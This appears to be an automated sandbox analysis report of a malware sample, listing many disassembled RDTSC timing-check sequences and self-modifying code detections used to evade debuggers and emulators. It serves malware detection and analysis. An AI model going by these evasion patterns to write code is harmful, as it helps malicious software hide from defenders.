                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 40B108 second address: 40B113 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 4529B9 second address: 4529CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 pushad 0x00000007 jmp 00007F400072A72Ah 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 452C62 second address: 452C7C instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4000E20B66h 0x00000008 jp 00007F4000E20B66h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 js 00007F4000E20B6Ah 0x00000016 pushad 0x00000017 popad 0x00000018 push edx 0x00000019 pop edx 0x0000001a rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 452F05 second address: 452F0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 452F0B second address: 452F14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 452F14 second address: 452F1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 452F1A second address: 452F1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 452F1E second address: 452F22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 452F22 second address: 452F5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F4000E20B6Ch 0x0000000c jc 00007F4000E20B66h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 jnl 00007F4000E20B66h 0x0000001a popad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F4000E20B74h 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 452F5F second address: 452F63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 452F63 second address: 452F69 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 452F69 second address: 452F6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 452F6F second address: 452F7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 4537DB second address: 4537E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 453D97 second address: 453D9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 453D9C second address: 453DA6 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F400072A72Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 454361 second address: 454365 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 4543AE second address: 4543E0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F400072A733h 0x0000000e xchg eax, ebx 0x0000000f mov edi, dword ptr [ebp+122D2F58h] 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F400072A72Ch 0x0000001d rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 454559 second address: 454564 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 454564 second address: 454568 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 454806 second address: 454814 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4000E20B6Ah 0x00000009 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 454E9D second address: 454EB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F400072A72Dh 0x0000000f rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 454EB4 second address: 454EC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4000E20B6Ah 0x00000009 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 454EC2 second address: 454EC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 45585C second address: 455862 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 455862 second address: 45586C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F400072A726h 0x0000000a rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 45567E second address: 455682 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 455682 second address: 45568C instructions: 0x00000000 rdtsc 0x00000002 jp 00007F400072A726h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 459764 second address: 459797 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4000E20B77h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007F4000E20B66h 0x00000011 jmp 00007F4000E20B70h 0x00000016 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 459797 second address: 4597C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F400072A72Ah 0x0000000e jo 00007F400072A739h 0x00000014 jmp 00007F400072A733h 0x00000019 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 4597C3 second address: 4597CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F4000E20B66h 0x0000000a rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 40E5BB second address: 40E5DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 jmp 00007F400072A738h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 459E2F second address: 459E33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 459E33 second address: 459E3D instructions: 0x00000000 rdtsc 0x00000002 js 00007F400072A726h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 459EE9 second address: 459F02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 jmp 00007F4000E20B6Fh 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 45B567 second address: 45B5BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 mov dword ptr [ebp+1246BBABh], edi 0x0000000c push 00000000h 0x0000000e mov esi, dword ptr [ebp+122D3048h] 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push esi 0x00000019 call 00007F400072A728h 0x0000001e pop esi 0x0000001f mov dword ptr [esp+04h], esi 0x00000023 add dword ptr [esp+04h], 0000001Dh 0x0000002b inc esi 0x0000002c push esi 0x0000002d ret 0x0000002e pop esi 0x0000002f ret 0x00000030 mov di, si 0x00000033 mov esi, dword ptr [ebp+122D2E70h] 0x00000039 xchg eax, ebx 0x0000003a push edi 0x0000003b jnc 00007F400072A728h 0x00000041 pop edi 0x00000042 push eax 0x00000043 pushad 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 45B5BC second address: 45B5C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 45F054 second address: 45F058 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 45F058 second address: 45F05E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 45F5FD second address: 45F601 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 45F601 second address: 45F605 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 45F605 second address: 45F60B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 45F60B second address: 45F643 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4000E20B7Fh 0x00000008 jmp 00007F4000E20B79h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 jmp 00007F4000E20B6Fh 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 45F643 second address: 45F647 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 45F647 second address: 45F64B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 4605AD second address: 4605B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 4605B2 second address: 46063C instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4000E20B68h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov edi, dword ptr [ebp+122D313Ch] 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007F4000E20B68h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 00000018h 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f mov dword ptr [ebp+122D2E00h], esi 0x00000035 mov bx, CA2Ch 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push eax 0x0000003e call 00007F4000E20B68h 0x00000043 pop eax 0x00000044 mov dword ptr [esp+04h], eax 0x00000048 add dword ptr [esp+04h], 00000019h 0x00000050 inc eax 0x00000051 push eax 0x00000052 ret 0x00000053 pop eax 0x00000054 ret 0x00000055 jmp 00007F4000E20B79h 0x0000005a mov dword ptr [ebp+12447E14h], esi 0x00000060 push eax 0x00000061 push eax 0x00000062 push edx 0x00000063 pushad 0x00000064 pushad 0x00000065 popad 0x00000066 push ebx 0x00000067 pop ebx 0x00000068 popad 0x00000069 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 4624B4 second address: 4624B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 4624B8 second address: 462505 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4000E20B73h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c stc 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F4000E20B68h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 push 00000000h 0x0000002b sub dword ptr [ebp+122D2E24h], esi 0x00000031 push eax 0x00000032 pushad 0x00000033 push edx 0x00000034 push edi 0x00000035 pop edi 0x00000036 pop edx 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a pop eax 0x0000003b rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 46348F second address: 463493 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 463493 second address: 463499 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 463499 second address: 4634A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 4634A9 second address: 4634E9 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4000E20B66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b nop 0x0000000c mov ebx, ecx 0x0000000e pushad 0x0000000f pushad 0x00000010 sbb edi, 1C879230h 0x00000016 jno 00007F4000E20B66h 0x0000001c popad 0x0000001d or dword ptr [ebp+124487D1h], edx 0x00000023 popad 0x00000024 push 00000000h 0x00000026 pushad 0x00000027 clc 0x00000028 mov dword ptr [ebp+122D21F3h], edx 0x0000002e popad 0x0000002f push 00000000h 0x00000031 mov ebx, 604D8937h 0x00000036 push eax 0x00000037 push eax 0x00000038 jnl 00007F4000E20B6Ch 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 466470 second address: 466485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F400072A730h 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 468306 second address: 468331 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4000E20B6Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4000E20B77h 0x00000012 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 468331 second address: 468336 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 469421 second address: 46943C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F4000E20B66h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4000E20B6Eh 0x00000012 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 46B4EE second address: 46B557 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 js 00007F400072A726h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F400072A728h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 00000015h 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 mov dword ptr [ebp+1244C356h], ebx 0x0000002f push 00000000h 0x00000031 and ebx, dword ptr [ebp+122D2F5Ch] 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push edi 0x0000003c call 00007F400072A728h 0x00000041 pop edi 0x00000042 mov dword ptr [esp+04h], edi 0x00000046 add dword ptr [esp+04h], 00000019h 0x0000004e inc edi 0x0000004f push edi 0x00000050 ret 0x00000051 pop edi 0x00000052 ret 0x00000053 xor dword ptr [ebp+124720F2h], edi 0x00000059 push eax 0x0000005a pushad 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 46B557 second address: 46B55B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 46FB0A second address: 46FB64 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 jns 00007F400072A73Ah 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F400072A730h 0x00000016 popad 0x00000017 nop 0x00000018 and edi, 62BF991Ch 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push edi 0x00000023 call 00007F400072A728h 0x00000028 pop edi 0x00000029 mov dword ptr [esp+04h], edi 0x0000002d add dword ptr [esp+04h], 00000019h 0x00000035 inc edi 0x00000036 push edi 0x00000037 ret 0x00000038 pop edi 0x00000039 ret 0x0000003a mov dword ptr [ebp+122D278Dh], edx 0x00000040 push 00000000h 0x00000042 clc 0x00000043 push eax 0x00000044 pushad 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 45A87F second address: 45A883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 45A883 second address: 45A8A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F400072A72Fh 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 45A8A0 second address: 45A8A6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 47217B second address: 472194 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400072A72Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007F400072A72Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 472194 second address: 472198 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 472198 second address: 47219D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 45F7C1 second address: 45F7DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4000E20B73h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 461741 second address: 4617C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 nop 0x00000006 jmp 00007F400072A737h 0x0000000b push dword ptr fs:[00000000h] 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007F400072A728h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 0000001Ah 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c mov dword ptr fs:[00000000h], esp 0x00000033 jmp 00007F400072A735h 0x00000038 mov eax, dword ptr [ebp+122D073Dh] 0x0000003e sub dword ptr [ebp+122D26E2h], ebx 0x00000044 push FFFFFFFFh 0x00000046 sbb di, C45Bh 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 jp 00007F400072A726h 0x00000056 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 4617C1 second address: 4617D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4000E20B6Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 463666 second address: 46366F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 46366F second address: 46371D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4000E20B76h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b mov bl, ah 0x0000000d push dword ptr fs:[00000000h] 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007F4000E20B68h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 0000001Ch 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e mov bx, si 0x00000031 mov dword ptr fs:[00000000h], esp 0x00000038 mov ebx, dword ptr [ebp+122D2F20h] 0x0000003e mov eax, dword ptr [ebp+122D0C75h] 0x00000044 push 00000000h 0x00000046 push edi 0x00000047 call 00007F4000E20B68h 0x0000004c pop edi 0x0000004d mov dword ptr [esp+04h], edi 0x00000051 add dword ptr [esp+04h], 0000001Bh 0x00000059 inc edi 0x0000005a push edi 0x0000005b ret 0x0000005c pop edi 0x0000005d ret 0x0000005e xor dword ptr [ebp+122D2DBBh], ebx 0x00000064 sub bx, 4C6Fh 0x00000069 push FFFFFFFFh 0x0000006b mov dword ptr [ebp+122D2549h], edx 0x00000071 nop 0x00000072 jns 00007F4000E20B82h 0x00000078 push eax 0x00000079 push edx 0x0000007a jmp 00007F4000E20B70h 0x0000007f rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 46371D second address: 463721 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 463721 second address: 46373F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4000E20B74h 0x0000000f rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 46373F second address: 463743 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Tries to evade debugger and weak emulator (self modifying code)
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: D9FE13 instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: F55922 instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: FCD5E7 instructions caused by: Self-modifying code
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeSpecial instruction interceptor: First address: 2AEF4A instructions caused by: Self-modifying code
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeSpecial instruction interceptor: First address: 2AEE56 instructions caused by: Self-modifying code
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeSpecial instruction interceptor: First address: 4476BE instructions caused by: Self-modifying code
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeSpecial instruction interceptor: First address: 4D03DB instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 35EF4A instructions caused by: Self-modifying code
